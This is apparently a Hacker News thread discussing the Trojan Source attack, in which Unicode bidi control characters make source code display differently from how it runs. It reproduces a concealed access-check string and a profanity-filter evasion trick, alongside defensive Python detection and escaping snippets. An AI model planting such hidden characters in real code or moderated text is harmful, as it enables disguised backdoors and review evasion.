Because visual representation is separate from the underlying data structure. A string container doesn't have a specific direction, only a relative one. I.e. This character comes before the next and after the previous. Adding the bidi control code, the string indicates when the visual ordering changes in this relative direction system.

You could absolutely design a new string container that assumes left to right at all times and cannot be changed, but then it's on the programmer to ensure that strings are copied or concatenated in the right direction, at the right location, and substring searching becomes a minor headache. How would you concatenate an RTL string to a forced LTR string representation? You would have to work out whether the end of the string is LTR or RTL. If LTR, append directly. If RTL, find the character where the direction changes and insert the string in there - much more expensive. Better to just append the string, using bidi codes where required, and let the frontend process the string to make the appropriate direction changes. Yes, you may need to search the string for the bidi code to know which direction you're going at the end of the string, but that's just a simple reverse string search for a single control character, and not a complex variable multi-byte search of inferred character directions by codepoint values.

I think the issue is in the locations of which bidi codes are rendered. They provide an inherent untrustworthy-ness to the text area they're rendered in, and so should be treated as an exception in critical situations. I've seen the reversed exe file name trick used for years, and every time I ask myself why that's even a thing? If the OS used file headers and magic numbers to determine file types instead of the filename, it would be less of an issue.

For source code, I would question the rendering of RTL text in a source code editor as it's an obvious issue for code safety. Ideally, all source code would be kept to the same origin language - doesn't have to be english, just consistent. Any non-conforming text should ideally be loaded from a resource rather than inline within the source code, to avoid foreign character contamination and allow easier identification of these issues. Further, source code rendering should only render identified safe control codes, and treat unsafe ones as raw binary values to be shown as such - i.e. \r and \n are safe, \b is unsafe, and bidi codes would also be unsafe. You could even go so far as to include them in the syntax highlighting, but that results in a dependency on syntax highlighting to show the semantics of the source code rather than the text alone.
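A rough sketch of what "treat unsafe ones as raw values" could look like, assuming a policy where only newline, carriage return and tab count as safe. The function name and the escape format are made up for illustration. Note that the Cf category also covers characters such as the zero-width joiner, so a real editor would probably want a narrower list.

```python
import unicodedata

# Assumption for this sketch: only these control characters are rendered as-is.
SAFE_CONTROLS = {"\n", "\r", "\t"}


def render_safely(text: str) -> str:
    """Return text with unsafe control/format characters shown as escapes."""
    out = []
    for ch in text:
        category = unicodedata.category(ch)
        # Cc = control characters (e.g. \b), Cf = format characters (e.g. bidi controls)
        if category in ("Cc", "Cf") and ch not in SAFE_CONTROLS:
            out.append(f"\\u{{{ord(ch):04X}}}")
        else:
            out.append(ch)
    return "".join(out)


sample = 'level = "user\u202e \u2066// admin\u2069"\b\n'
print(render_safely(sample))
```

The text still reads left to right in the viewer, and every hidden control shows up as a visible escape instead of silently reordering the line.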

Or, hear me out - instead of trying to work around a legitimate feature of Unicode, you could stop storing your source code as text, because it isn't. Code is not text - it's a tree of objects, and representing it as a flat sequence of text characters causes many problems and inefficiencies (including this one!) that could be mitigated if you just stored and manipulated it as a tree.

The only reason why text was justifiable as a storage and manipulation format for code in the first place was because early computers (probably?) couldn't handle a tree format. That excuse has been invalid for several decades now, as is the idea that "everything is plain text". Code isn't plain text - if it was, then you could make arbitrary edits without syntax errors, but you can't, because code has structure. Start treating it that way.

The thing about text is that it is barebones. Everyone can agree what the structure of text is (a stream of bytes with some ascii like encoding).

For representing code as more than text, you will lose so many tools that can handle your code; it's a massive setback. Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.

Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.

> The thing about text is that it is barebones.

That's a bug. Programming is hard, and you want the best, most powerful tools to handle it as you can - which means putting effort into making specialized tools instead of using generic ones like text editors.

> For representing code as more than text, you will lose so many tools that can handle your code; it's a massive setback.

No tools existed without first being built, so this isn't special. Rust didn't have any tools before people started building tools for it, for instance.

Moreover, the tools that we have now that are text-specific are pathetic. You can view the first n lines of a file? Wow, very impressive /s. More complex things like grep are just as realizable in a structure editor, and in order to use them for non-trivial stuff, you'd have to write structural regular expressions and implement mini-parsers anyway - things you would get for free if you just kept code as structure.

> Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.

You're misreading my argument. I'm not saying that people will adopt structured code (a descriptive statement), I'm saying that people should adopt structured code (a normative statement) because it'll be much better for them.

Also, you're making the assumption that onboarding is hard, and that compatibility layers can't exist - neither of which is true.

> Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.

The average programmer probably looks at their code with a hex editor once in their life - this isn't really a good argument. Moreover, the vast majority of programmers already tolerate not looking under the hood in dozens of different ways - most use VM's like CPython/JVM/JS VMs, opaque frameworks like React/Angular, graphics APIs like OpenGL/DirectX/Vulkan, complicated editors like Visual Studio Code/Emacs, and far more without ever looking under the hood of any of those - so there's no reason to not add another layer (especially because you can build that layer to be easy to peer through) for the sake of productivity.

Yes! This would also do away with a whole class of conflicts related to whitespace/formatting.

Exactly! Imagine a version control system where you get diffs on the AST tree, instead of the characters that make up the source (add an `if` and suddenly dozens of lines have "changed"), or the tabs/spaces flamewar evaporating instantly.

Nothing is stopping your current version control tool from parsing the code and showing a structural diff now.
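As a small illustration for Python sources only: the standard library's ast module can already tell a formatting-only change from a real one. This is a sketch of the idea, not a feature of any existing version control tool, and `same_structure` is a name I made up.

```python
import ast


def same_structure(old_source: str, new_source: str) -> bool:
    """True when both sources parse to the same syntax tree."""
    # ast.dump omits line/column attributes by default, so layout,
    # whitespace and comments do not affect the comparison.
    return ast.dump(ast.parse(old_source)) == ast.dump(ast.parse(new_source))


before = "def f(x):\n    return x+1\n"
reformatted = "def f( x ):\n\n        return x + 1   # same logic\n"
changed = "def f(x):\n    return x + 2\n"

print(same_structure(before, reformatted))  # formatting-only change
print(same_structure(before, changed))      # real change
```

A diff tool built on this would still need to map tree differences back to something readable, which is where most of the work is.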

Also helps with naming. Only need a value once or twice? Don’t bother trying to name it, just link it into the tree where it’s needed.

You can actually do that in Lisp. Lisp code is commonly thought of as a tree, but it is really a bunch of linked lists. The links can be arranged in any way you want.


The example shows this with some made–up data, but you can use it with arbitrary code as well. It is very easy to use it to create circular lists, which when executed are infinite loops.

Naturally the only sane thing to do is to keep your code strictly a tree.

I remember bringing this up many years ago. Yes specifically making code seem like comments using bidi. I'm just a little bit salty I won't get the credit.


Although I'm not a native English speaker, and almost every program I ever wrote was meant to process any given language (and in some cases to have a localized UI), I see no reason for non-English strings to be allowed in source code and code files, except in some ad-hoc scripts where hard-coding some text can be the optimal solution.

We probably just need a git switch which would make it throw an error if it encounters Bidi or any weirdness like that except in resource files.
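I'm not aware of such a switch in git itself, but a check like this could be wired into a pre-commit hook or CI job. A minimal sketch, assuming the nine bidi controls listed in the Trojan Source report are the ones to reject; the function name is made up and the resource-file exemption is left out.

```python
# Bidirectional controls from the Trojan Source report:
# LRE, RLE, PDF, LRO, RLO (U+202A..U+202E) and LRI, RLI, FSI, PDI (U+2066..U+2069).
BIDI_CONTROLS = {chr(cp) for cp in range(0x202A, 0x202F)} | {
    chr(cp) for cp in range(0x2066, 0x206A)
}


def find_bidi_controls(text: str) -> list:
    """Return (line, column, codepoint) for every bidi control in text."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                hits.append((line_no, col, f"U+{ord(ch):04X}"))
    return hits


source = 'ok = True\nif level != "user\u202e": pass\n'
for line_no, col, code in find_bidi_controls(source):
    print(f"line {line_no}, column {col}: bidi control {code}")
```

A hook would read each staged file, call the function, and exit non-zero when the list is not empty.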

Since most programming languages are based on english, non-english text in string literals is almost always user-facing and should be put in resource files to make translation into additional languages easier.

Identifiers and comments are a serious problem though. Many application domains use terms that are tricky to translate into english. The translations could be misleading, inappropriate or not unique. Sometimes they are just plain wrong or there is no english word that fits. All of these could cause misconceptions, confusion and bugs, and make reading and working with the code and the running system harder.

> Many application domains use terms that are tricky to translate into english.

What if instead of translating those terms to English, you just transliterated them to the Latin alphabet?

That works perfectly fine for German. For languages with latin-style alphabets it depends on how used people are to working with unaccented text. For some languages (for example Vietnamese[0]), the ASCII fallback modes are quite clumsy. Languages with non-latin alphabets might completely lack a standardized, widely used romanization system that works in ASCII.

For Chinese and Japanese, using a romanization is not really an option. Most romanization systems are intended for academic study, as pronunciation aids and for input methods. Most varieties of Chinese have a huge number of homophones, and the romanization of such texts can be difficult to read unambiguously.

[0]: https://en.m.wikipedia.org/wiki/Vietnamese_Quoted-Readable

So you mean you can write a program and be unable to explain what it does in plain English?

The basic operation can be explained in English, but comments for that are potentially not as important as the implications for the application domain.

Non-English characters are quite useful in comments where you're explaining Unicode processing stuff, and in regexes working with the characters, and when you're using maths notation (proper symbols in comments, Greek letters for variables, etc.), and when you're drawing boxes in a terminal. I'm sure there are many more too.

I omitted this to keep it simple (this is why I wrote non-English rather than non-ASCII, I actually am a proponent of active usage of proper Unicode symbols like ⇒, ≠, etc, and also TUIs) but yes, I would prefer a rather extended English char-set including Greek letters, mathematical symbols, pseudographics etc. These can be useful and are not much trickier than English letters. But I would certainly like to see at least a warning (I would even prefer an Error actually) if my code file includes anything related to RTL, complex character composition or non-Latin letters other than Greek.
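A rough sketch of that kind of policy check using Python's unicodedata module. The rules are my reading of the comment above (flag RTL and bidi controls, combining marks, and letters that are neither Latin nor Greek), and the name-prefix test is a heuristic rather than a proper script lookup.

```python
import unicodedata

# Bidi classes for right-to-left letters and explicit directional controls.
RTL_OR_BIDI = {"R", "AL", "RLE", "RLO", "RLI", "LRE", "LRO", "LRI", "FSI", "PDF", "PDI"}


def suspicious_characters(text: str) -> list:
    """List (index, codepoint, reason) for characters outside the policy."""
    findings = []
    for index, ch in enumerate(text):
        reason = None
        if unicodedata.bidirectional(ch) in RTL_OR_BIDI:
            reason = "right-to-left or bidi control"
        elif unicodedata.combining(ch) != 0:
            reason = "combining mark"
        elif ch.isalpha():
            # Heuristic: the Unicode character name starts with the script name.
            name = unicodedata.name(ch, "")
            if not name.startswith(("LATIN", "GREEK")):
                reason = "letter outside Latin/Greek"
        if reason:
            findings.append((index, f"U+{ord(ch):04X}", reason))
    return findings


# Mathematical symbols and Greek letters pass; a Cyrillic homoglyph does not.
print(suspicious_characters("x \u2260 \u03bb \u21d2 ok"))
print(suspicious_characters("p\u0430yload"))
```

Whether a finding is a warning or an error would be up to the project.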

Looks like avoiding dependencies and snippets is a good way to mitigate this.

In my own work, I use almost no dependencies (aside from compilers and built-in APIs). Scratch that. I use a lot of dependencies, but ones that I have written, and generally rewrite snippets, when I use them.

Also, very little of the code I see, has comments.

Like, any comments; even headerdoc comments.

> Green said the good news is that the researchers conducted a widespread vulnerability scan, but were unable to find evidence that anyone was exploiting this. Yet.

… “yet” …

I know that I’m a “dependency curmudgeon,” but stuff like this just serves to reinforce my posture.

But what if this is slipped into your compiler? Your operating system's kernel? A top voted Stack Overflow answer? You can't (or it's infeasible to) check and control everything.

sigh...Why does it have to be "all or nothing"? These logical fallacies are pretty much a standard in these discussions.

Either have 100%, ironclad security, or "Who cares? YOLO! STDs be damned" abandon?

We do what we can to make sure what we write is as good as possible.

I lock my car door, when I get out. I know that it won't stop a determined thief, but it will avoid problems from the casual knucklehead.

Yes, you're totally safe then. I've never heard of standard libraries having problems that affect security, certainly not the str* family of functions.

Any particular reason for the nasty? I thought we didn't do that kind of thing, around these parts, but I'm often wrong.

The pain of having worked under these conditions of not using libraries, usually having to work with subpar libraries that were developed internally.

Like oh, hey, we need a database, great, lets roll our own. Or the ancient version of whatever lib shipped with the OS that is full of bugs solved in subsequent versions.

I see that you now use a lot of dependencies, and retract my statement.

Feel free to check out my work. You’ll see the quality bar I set for myself. Almost all of the repos are code that I incorporate into my projects. I just. Plain. Don’t. Trust. most code out there.

I can see the kitchen from the lunch counter, and I’m a damn good cook, myself.

I won’t tell anyone else what to do (unless I’m paying them), but I refuse to add code to my projects that I don’t trust completely (which is, I know, not a guarantee, but it’s a pretty good bet).

I have to rely on the core libraries and development tools I use, but, if I have my druthers, I am picky as hell.

Seriously. Look at my stuff. You’ll see that I put my work where my mouth is.

The bootstrappable community already produced a solution for this: https://github.com/oriansj/stage0/blob/master/High_level_pro...

I fail to see how this can actually be used as an exploit. As some commenters have said, yes, it may be a risk to some open source tools where there is poor due diligence for merge request review process - but that is almost never the case.

Otherwise, if you own your own code, this obviously isn't an issue. (Unless, of course, for some reason you want to program exploits into software at your organization :) )

Heck, even GitHub already shows a warning for files that have bi-directional unicode...

A bit of an overemotional title if you ask me.

https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html has a nice clear example.

Full Stack Chris reviews some code that he thinks says:

    if access_level != "user" { // Check if admin

This may be an open source project. This may be an internal bad egg (a very common threat; insider jobs are actually one of the absolute top risks to a company). Or this code may be injected by an attacker who has gained access to the repo and is leaving backdoors that they hope to survive long after their access is blocked or leaving backdoors to make deployed production systems vulnerable. Etc.

And Chris won't notice that the computer will execute:

    if access_level != "user{U+202E} {U+2066}// Check if admin{U+2069} {U+2066}" {

This is not just an attack on compiled languages. Scripting languages are just as vulnerable.
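To make that concrete in a scripting language, here is a small Python sketch that uses the same literal as above, with the bidi controls written as escapes so they stay visible. The variable names are mine.

```python
# The literal from the example above. An editor that applies bidi reordering
# may show the tail of this string as if it were a comment after the quote.
hidden_literal = "user\u202e \u2066// Check if admin\u2069 \u2066"

access_level = "user"

# The interpreter compares code points, not what the editor displays.
print(hidden_literal == "user")
print(access_level != hidden_literal)
print(len("user"), len(hidden_literal))
```

The comparison against the hidden literal is never equal for a plain "user", so a regular user falls into the branch that a reviewer believes is reserved for admins.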

Sorry, still don’t get it.

Isn’t the issue that they are using magic strings? If the strings were something like RoleConstants.Admin then this is avoided?

Though I don’t understand the point of the Unicode characters in the comment string so I must be missing something.

> Though I don’t understand the point of the Unicode characters in the comment string so I must be missing something.

There is no comment string.

So after reading other parts, I get where I was mistaken but still believe proper coding practices of avoiding magic strings would avoid many of the potential issues.

My mistake was thinking the initial Unicode character was changing the comparison string, similar to how a non-printable character could. But instead it flips the ordering so that the comment is part of the comparison string and then the string is terminated.

Don’t get hung up on strings, you can execute this attack with just comments. Look at the other examples in the paper.

The idea here is that you make part of the comment appear to be outside of it, and thus appear to be code that will be executed. You can reshuffle the text arbitrarily, so you can move text backwards to appear to be before the start of the comment, or forwards to appear to be after the end of the comment. If you really want to, you can treat the whole line as an anagram, and rearrange the individual letters into any order you like. This could enable really clever attacks where any use of an enum constant appears to be a use of a different one.

And the dev wrote test cases (negative ones too!). The test fails and shows admin privileges for the normal user. Debugging ensues. I'd hope.

The test has the same kind of change. It passes, and nobody thinks to look at the obviously-correct code.

It's this research that prompted GitHub to show warnings, they didn't appear as of yesterday.

Code search is helpful to see if any of your code contains these characters.

A bunch of hits found across the top ~2M open-source repositories: https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...

To triage, you probably want to first look at hits in code files (not JSON or Markdown, etc.):


You can set up a self-hosted instance of Sourcegraph to run this across all of your company's code: https://docs.sourcegraph.com/.

It all depends on your IDE. I've tried this, and IntelliJ and friends will show a little block with the text RLO for the right-to-left override or ZWS for zero-width space for any non-standard character that might mess things up. (Neo)vim will show the Unicode escape sequence instead of rendering the text as Unicode directs it.

Some compilers, notably clang, will warn you that you're using an "invisible character". Assuming you at least read the warnings your code generates (because if you don't, why not just put exploitable algorithms deep down in the software?), you'd probably catch the issue.

Simpler programs such as the text editor that ships with GNOME will freak out, but I don't think most people are coding in that in the first place.

I think this is an interesting peculiarity, but it's not a "threat" to "the security of all code".

I'd say that neovim is bugged here and gedit is the one working properly rendering unicode as it should be

I filed this domain away under 'security alarmist nonsense' years ago. This headline and story are prime examples of the form.

Seriously. State run espionage is 100x more likely

That Unicode with its extremely large character set would become a solution to any and all character encoding problems in itself was never the case. Usually, for a given document you'll want to declare the subset that's actually in use such that a particular font with necessarily limited coverage can be used to render it. That's what's available for SGML markup documents eg in an SGML declaration, where you can declare and construct a document character set from planes or arbitrary code point ranges, and an SGML parser can verify actual content against that subset.

Was that capability dropped in the transition from sgml to XML? If so, can someone here on HN provide some pointers to the old discussion?

All discussion related to creating XML as an SGML subset can be found on the xml-dev mailing list [1], with some earlier discussions and initial drafts of the SGML ERB mostly linked from there.

The capability to declare document character sets was dropped along with supporting an SGML declaration altogether.

[1]: http://lists.xml.org/archives/xml-dev/

Emacs "fix": (setq bidi-display-reordering nil) in relevant modes.

I forced it globally, are there reasons that's bad to do?

    (setf (default-value 'bidi-display-reordering) nil)

The BIDI issue looks pretty bad in emacs-gtk: the sneaky text is unnoticeable in lots of modes, unless the cursor just happens to scroll over it.

Why did you put "fix" in quotes? Isn't that an actual fix for this?

It's more of a workaround that breaks things for people legitimately using RTL strings isn't it?

Yes. I recommend using whitespace-mode to cause these characters to be displayed visually, while still functioning correctly.

It’s not the same thing, but it brings to mind Ken Thompson’s famous “Reflections on Trusting Trust” [0] from 1984.

That describes a concept, over several stages, where a compiler can be made to change the behavior of programs it compiles in a difficult-to-find way.

[0]: https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...

Bidi controls can be used to evade profanity filters. Writing something like `&#x202e;kcuf` will display a banned word.

Does it work here?

> I am an toidi

No? HN strips the bidi control.

But there are plenty of other systems which display weird RTL behavior.
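A toy sketch of why a naive filter misses this, and one possible countermeasure. The word list is hypothetical, and the override-aware check is a simplification that ignores terminators (PDF/PDI) and nested controls.

```python
BANNED = {"idiot"}  # hypothetical word list for this sketch
RLO = "\u202e"      # RIGHT-TO-LEFT OVERRIDE


def naive_filter(message: str) -> bool:
    """Return True when the message contains a banned word as stored."""
    lowered = message.lower()
    return any(word in lowered for word in BANNED)


def override_aware_filter(message: str) -> bool:
    """Also check the text after each RLO in reversed (displayed) order."""
    if naive_filter(message):
        return True
    # Simplification: treats everything after an RLO as reversed on screen.
    for segment in message.split(RLO)[1:]:
        if naive_filter(segment[::-1]):
            return True
    return False


message = "I am an " + RLO + "toidi"
print(naive_filter(message))
print(override_aware_filter(message))
```

Stripping the control, as HN appears to do, is the simpler option when RTL overrides have no legitimate use in the field.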

Yes, Mastodon has recently been discussing this. https://github.com/mastodon/mastodon/issues/2777

Would the solution to this be to render the direction switch control character similar to how some text editors will render 0 bytes as a glyph with the text NUL? You could still render everything after it with the reversed direction, but it provides a visible indicator that it's been done. It might be a little annoying for people who use RTL languages, but it seems like the benefit may outweigh that.

For anyone that wants to see the real code:


I've not seen one editor yet that doesn't at least hint there's a problem with syntax highlighting, if not just outright show nonsense.

This reminds me of a trick you could do on the Commodore PET in the 1980s, where you'd embed backspaces in your BASIC code. If someone looked at the code they'd see something different from what gets executed. Effective to keep someone from copying your code in class :-)

Something puzzles me: this kind of tricks would definitely break syntax highlighting, wouldn't it?

I would say it's less that they discovered a new vulnerability and more that they brought needed focus to a long-known problem.

It's just that many people while knowing the problem never considered that it could be used in supply chain attacks.

The good old SexyHexe.pdf strikes again.

These problems won't go away for a while; Unicode is fucking hard. Almost every app I ever tried had at least some problems with U+202E (the right-to-left override).

I thought this was a case of Source code virus[1]. With the current popularity of open source and services like github, combined with deep inter-dependencies in node.js, a virus of this kind could have a huge impact if unnoticed for long enough.

Maybe it is the next plague waiting to happen?

[1] https://en.wikipedia.org/wiki/Source_code_virus

Why is it called a Trojan horse instead of a Greek horse?

Because the Greeks transferred ownership.
